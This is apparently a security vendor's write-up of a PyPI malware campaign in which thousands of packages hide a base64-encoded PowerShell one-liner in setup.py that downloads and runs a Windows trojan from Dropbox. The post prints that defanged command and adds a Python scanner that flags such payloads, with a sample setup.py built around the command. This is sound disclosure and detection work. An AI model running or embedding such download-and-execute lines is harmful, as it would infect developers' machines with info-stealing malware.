Sonatype has been tracking an open source malware campaign that developed over the weekend, in which a threat actor is infiltrating the PyPI software registry with thousands of malicious packages. These packages are being rapidly removed by the PyPI admins as they appear, but the activity has continued well into today.
The reports of this activity were first brought to our notice by security researcher Félix Aimé.
Downloads Windows trojan from Dropbox
We observed hundreds of packages getting published and removed in batches on the PyPI registry. These packages, despite containing contextual terms like “libs,” “nvidiapaypalsuper,” and so on, are named quite arbitrarily. All of them contain the description, “A library for creating a terminal user interface.”
Although these packages are rapidly being purged as they appear on PyPI, Sonatype’s malware archives continue to retain copies of these malicious artifacts.
Based on our analysis, these packages contain an identical payload targeting Windows users, as shown below.
The ‘setup.py’ (manifest file) within these packages contains a one-liner payload which is base64-encoded:
The malicious code (line 9) in question invokes a PowerShell command on an infected Windows machine to download a second-stage payload from a Dropbox URL:
powershell Invoke-WebRequest -Uri "hxxps://dl.dropbox[.]com/s/szgnyt9zbub0qmv/Esquele.exe?dl=0" -OutFile "~/WindowsCache.exe"; Invoke-Expression "~/WindowsCache.exe"
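As an added defensive example (not code from Sonatype's post), the following scanner walks the AST of a setup.py, decodes base64 string literals and flags any that decode to the kind of PowerShell download-and-execute one-liner described above. The sample setup.py is constructed here and embeds the defanged command quoted above; the marker list is an assumption drawn from that command.

```python
import ast
import base64
import binascii
import re

# Substrings a decoded literal is checked against; drawn from the one-liner shown above.
PAYLOAD_MARKERS = ("powershell", "invoke-webrequest", "invoke-expression", "dropbox")
# A plausible base64 literal: long enough to hold a command, base64 alphabet only, optional padding.
B64_RE = re.compile(r"^[A-Za-z0-9+/]{24,}={0,2}$")


def decode_if_base64(text):
    """Return the decoded text if `text` is a valid base64 string that decodes to UTF-8, else None."""
    if not B64_RE.match(text):
        return None
    try:
        return base64.b64decode(text, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def scan_setup_py(source):
    """Return (line_number, decoded_text, matched_markers) for every string literal in a
    setup.py that is base64 and decodes to something containing the payload markers."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            decoded = decode_if_base64(node.value)
            if decoded is None:
                continue
            hits = [m for m in PAYLOAD_MARKERS if m in decoded.lower()]
            if hits:
                findings.append((node.lineno, decoded, hits))
    return findings


# Constructed sample: the defanged command quoted in the post, base64-encoded as a literal
# in a setup.py that otherwise looks like the packages described (name and description).
DEFANGED_CMD = ('powershell Invoke-WebRequest -Uri "hxxps://dl.dropbox[.]com/s/szgnyt9zbub0qmv/Esquele.exe?dl=0" '
                '-OutFile "~/WindowsCache.exe"; Invoke-Expression "~/WindowsCache.exe"')
SAMPLE_SETUP_PY = (
    "from setuptools import setup\n"
    "setup(name='nvidiapaypalsuper', version='0.1',\n"
    "      description='A library for creating a terminal user interface')\n"
    f"PAYLOAD = '{base64.b64encode(DEFANGED_CMD.encode()).decode()}'\n"
)

if __name__ == "__main__":
    for lineno, decoded, hits in scan_setup_py(SAMPLE_SETUP_PY):
        print(f"line {lineno}: base64 literal decodes to a command matching {hits}")
        print(f"  {decoded}")
```

Run against a directory of extracted sdists, the same function can be pointed at each package's setup.py; literals that are base64 but decode to harmless text produce no finding because none of the markers match.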
Thankfully, at the time of our analysis, Dropbox had suspended the offending URL, although we were still able to obtain copies of the malicious executable from another source:
The malicious EXEs (IOCs below) being downloaded by the illicit packages are Windows trojans with potential spyware and info-stealing code:
The threat actor publishing these packages calls themselves “EsqueleSquad” and, interestingly, has mentioned their email address and website, “www.esquelesquad[.]rip”, within these packages:
It is still not clear what purpose the threat actor is trying to achieve, mainly because, despite containing a working malicious payload, the packages are named in a confusing manner with no obvious targets. The influx of malicious packages in batches is continuing at the time of writing, and our researchers continue to monitor the situation.
In late 2022, threat actors had flooded the PyPI and npm registries with over 200 cryptominers. In early 2021, we saw more than 5,000 dependency confusion packages infiltrating both open source registries.
Users of Sonatype Repository Firewall can rest easy knowing that such malicious packages would automatically be blocked from reaching their development builds.